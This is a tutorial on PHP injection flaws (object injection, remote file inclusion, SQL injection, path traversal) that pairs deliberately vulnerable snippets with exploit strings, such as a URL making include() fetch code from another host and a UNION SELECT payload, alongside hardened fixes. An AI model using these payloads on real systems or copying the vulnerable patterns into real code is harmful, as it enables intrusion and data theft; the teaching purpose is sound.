Understanding PHP Object Injection

PHP injection, or PHP Object Injection, is an application-level vulnerability that allows an attacker to carry out various kinds of attacks, such as SQL injection, application denial of service, code injection and path traversal, depending on the context. The vulnerability generally occurs when user-supplied input is not sanitized properly before being passed to the unserialize() PHP function, which takes a single serialized variable and converts it back into a PHP value. PHP's object serialization feature lets an attacker pass serialized strings to a vulnerable unserialize() call, and this results in an arbitrary PHP object being injected into the scope of the application. Serialized strings are storable representations of values.

In order to exploit a PHP Object Injection vulnerability fully, two conditions must be met:

1) The application should have a class that implements a PHP magic method (such as __destruct, __construct, __set or __wakeup) that can be used to carry out malicious attacks.

2) All the classes used during an attack must be declared at the time unserialize() is called, or object autoloading must be supported for those classes.
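The two conditions above in code, as an added example that is not from the original article: a class with a magic method that unserialize() will trigger, and the hardened calls that prevent it. The class, the serialized string and the file path are constructed for the demonstration.

```php
<?php
// Added example, not code from the original article: a class with a magic
// method, the unsafe unserialize() of untrusted input, and two hardened
// alternatives. The class and the serialized string are constructed.
class CacheEntry
{
    public string $file = '/tmp/cache.txt';
    public string $data = '';

    // Magic method: PHP calls it automatically when the object is destroyed,
    // so it runs for any CacheEntry that unserialize() creates, without the
    // application ever calling a method on that object itself.
    public function __destruct()
    {
        file_put_contents($this->file, $this->data);
    }
}

// Constructed input shaped like an attacker's: both fields chosen by the sender.
$untrusted = 'O:10:"CacheEntry":2:{s:4:"file";s:17:"/tmp/injected.txt";s:4:"data";s:5:"hello";}';

// Vulnerable (condition 1 + 2 met): CacheEntry is declared, so it is
// instantiated and its __destruct() fires with sender-controlled fields.
function loadUnsafe(string $input)
{
    return unserialize($input);
}

// Hardened (PHP 7.0+): no class may be instantiated. Objects come back as
// __PHP_Incomplete_Class, whose magic methods never run.
function loadSafe(string $input)
{
    return unserialize($input, ['allowed_classes' => false]);
}

// Preferred for untrusted data: a data-only format instead of serialize().
function loadJson(string $input): array
{
    $value = json_decode($input, true, 512, JSON_THROW_ON_ERROR);
    return is_array($value) ? $value : [];
}

$obj = loadSafe($untrusted);
var_dump(get_class($obj) === '__PHP_Incomplete_Class'); // bool(true)
var_dump(file_exists('/tmp/injected.txt'));              // bool(false): nothing was written
```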


PHP code injection:

When code is injected straight from an outside source into a script or program and executed, the process is known as code injection. The example below will help you gain a better understanding of a PHP code injection vulnerability:

.. header html ..

<?php
// $page is taken straight from the request (?page=...) and is never checked
$page = $_GET['page'];
include($page);
?>

.. footer html ..

The header and footer do not contain any PHP code, only HTML, and the snippet may not look like a big mistake. Yet, since the variable $page is never checked, the attacker can choose whatever he wants to include. So how is it possible to exploit the code above?

Exploit example:

An attacker can create a ‘txt’ file on another server and have the example above include it. This ‘txt’ file may contain PHP code that will be executed on the exploited host.

<?php

phpinfo();

?>

Suppose the vulnerable code is located at ‘http://domain1/index.php’ and the ‘txt’ file at ‘http://domain3/vulcode.txt’. The attacker could then type a single line into his browser that looks like this:

http://domain1/index.php?page=http://domain3/vulcode.txt  

In the end the function ‘phpinfo()’ will be executed between the header and the footer, where the PHP include is located.

The function ‘include()’ takes the contents of the file named between its parentheses. Assume the URL above is pasted into the browser: the $page variable now contains ‘http://domain3/vulcode.txt’, so replacing every occurrence of $page with this string gives:

... html header ...

<?php
include('http://domain3/vulcode.txt');
?>

... html footer ...

The include function now fetches the code from the URL and places it where it was called:

... html header ...

<?php

phpinfo();

?>

... html footer ...

This will be processed by the server. Here, the header will be displayed and the phpinfo() will be executed after that. Finally, the footer will be displayed.
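One way to remove this vulnerability, as an added example that is not the article's code: the request selects a page from a fixed allowlist instead of naming a file, so no attacker-supplied string ever reaches include(). The page keys, file names and pages/ directory are assumptions for the demonstration.

```php
<?php
// Added example, not from the original article: the unchecked include($page)
// replaced by an allowlist lookup. Keys, file names and the pages/ directory
// are constructed for the demonstration.
const PAGES = [
    'home'  => 'home.php',
    'about' => 'about.php',
];

// Maps the untrusted ?page= value to a file path, or null if it is not a known page.
function resolvePage(array $pages, ?string $requested): ?string
{
    $key = $requested ?? 'home';
    // Only literal allowlist keys pass; "http://domain3/vulcode.txt" or
    // "../../etc/passwd" can never become a file name here.
    if (!array_key_exists($key, $pages)) {
        return null;
    }
    $path = __DIR__ . '/pages/' . $pages[$key];
    return is_file($path) ? $path : null;
}

// Defence in depth: remote includes should also be disabled in php.ini
// (allow_url_include=Off, the default since PHP 5.2), so that even a missed
// check cannot fetch code from another host as in the exploit above.
if (filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN)) {
    error_log('allow_url_include is enabled; remote file inclusion is possible');
}

$target = resolvePage(PAGES, $_GET['page'] ?? null);
if ($target === null) {
    http_response_code(404);
    exit('Unknown page');
}
// ... html header ...
include $target;
// ... html footer ...
```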


Problems it can cause:

This depends entirely on the attacker, who can cause many kinds of problems. Malicious code injected this way can lead to the following:

  • It is possible for an attacker to obtain your database username and password.
  • An attacker can send spam to different email addresses using your website.
  • An attacker can deface your website.
  • An attacker can gain access to your private information.
  • An attacker can gain access to the server of any website.

PHP SQL injection:

PHP SQL injection is a code injection technique that is used for attacking data-driven applications where malicious statements can be inserted into the entry field for execution. This problem occurs when the input variables entered by the user are not carefully checked by the programmer.

Example:

...

// $id is copied from the query string and spliced into the SQL text unchecked
$id = $_GET["id"];
$res = mysql_query("SELECT * from art where id=$id;");

...

Exploit:

page.php?id=0 UNION SELECT * FROM admin

Here the variable $id is not checked and is placed directly into the SQL query, so the server finally receives:

SELECT * from art where id=0
    UNION SELECT * FROM admin;

The variable $id is expected to be a number, so it can be checked as a precaution. A general approach is to strip all illegal content from the variable rather than checking it and displaying an error message. The following are the two approaches you can take:

...

$id=intval($_GET["id"]);

...

The code above uses the intval() function, which converts its argument to an integer and so removes any illegal content from the variable.

...

$id = $_GET["id"];

if (!is_numeric($id)) {
    ... handle error ...
} else {
    ... continue ...
}

...

The code above evaluates the “if” condition: if the $id variable contains anything other than a number, the error is handled; if it is numeric, execution continues.
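The article's query with a prepared statement, as an added example that is not from the original: the value travels as a bound parameter instead of SQL text, with the integer check kept as a first line of defence. PDO with an in-memory SQLite database stands in for the original's mysql_query(), and the tables and rows are constructed so the example runs offline.

```php
<?php
// Added example, not from the original article. PDO + SQLite in memory replace
// the article's mysql_query(); the tables and rows are constructed test data.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE art (id INTEGER PRIMARY KEY, title TEXT)');
$db->exec('CREATE TABLE admin (id INTEGER PRIMARY KEY, password TEXT)');
$db->exec("INSERT INTO art VALUES (1, 'First article')");
$db->exec("INSERT INTO admin VALUES (1, 'secret')");

// Vulnerable: the raw value becomes part of the SQL text, so the UNION from
// the article's page.php?id=0 UNION ... request is executed as written.
function fetchArtUnsafe(PDO $db, string $id): array
{
    return $db->query("SELECT * FROM art WHERE id=$id")->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened: reject anything that is not a well-formed integer, then bind the
// value as a parameter so it can never change the shape of the statement.
function fetchArtSafe(PDO $db, string $id): array
{
    if (filter_var($id, FILTER_VALIDATE_INT) === false) {
        return []; // handle as an error; no query is issued
    }
    $stmt = $db->prepare('SELECT * FROM art WHERE id = :id');
    $stmt->execute([':id' => (int) $id]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$injected = '0 UNION SELECT * FROM admin';
var_dump(count(fetchArtUnsafe($db, $injected))); // int(1): the admin row leaks
var_dump(count(fetchArtSafe($db, $injected)));   // int(0): rejected before any query
var_dump(count(fetchArtSafe($db, '1')));         // int(1): the legitimate row
```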

Path traversal:

Path traversal accesses files and directories located outside the web root folder. By browsing through the application, the attacker searches for absolute paths to files stored on the web server. Arbitrary files and directories on the file system can then be reached by manipulating variables that reference files with “dot-dot-slash (../)” sequences; the attacker generally uses “../” sequences to move up towards the root directory.

Example:

http://some_site.com.br/some-page?page=http://other-site.com.br/other-page.htm/malicious-code.php

Scripts and files located on external websites can be included this way. In the example above, the file “malicious-code.php” will be included.
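A containment check for the case where a file name really must come from the request, as an added example that is not from the original article: the path is canonicalised with realpath() and accepted only if it stays inside the pages directory, which rejects both the “../” sequences and the external URL described above. The pages directory and its contents are created here as constructed test data; str_starts_with() requires PHP 8.0.

```php
<?php
// Added example, not from the original article: canonicalise a requested file
// name and accept it only if it resolves inside $base. The directory and the
// file are constructed test data.
$base = sys_get_temp_dir() . '/pages_demo';
@mkdir($base);
file_put_contents("$base/about.htm", "<p>About us</p>\n");

// Returns the canonical path of the requested file if, and only if, it lies
// inside $base; otherwise null. realpath() collapses "../" and symlinks and
// returns false for non-existent paths, including URLs such as http://...
function resolveInside(string $base, string $requested): ?string
{
    $root = realpath($base);
    $path = realpath($base . '/' . $requested);
    if ($root === false || $path === false) {
        return null;
    }
    // Compare with a trailing separator so a sibling directory whose name
    // merely starts with $root (e.g. pages_demo_evil) cannot pass.
    return str_starts_with($path, $root . DIRECTORY_SEPARATOR) ? $path : null;
}

var_dump(resolveInside($base, 'about.htm') !== null);                           // bool(true)
var_dump(resolveInside($base, '../../etc/passwd'));                              // NULL
var_dump(resolveInside($base, 'http://other-site.com.br/malicious-code.php'));   // NULL
```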


Conclusion:

PHP injection is an application-level vulnerability that opens a door for the attacker, allowing him to carry out attacks such as SQL injection and code injection. An attacker can cause many kinds of damage and destroy a user’s privacy in an instant, so the necessary precautions need to be taken. Doing so will help you protect your privacy and stop several malicious attacks from hackers.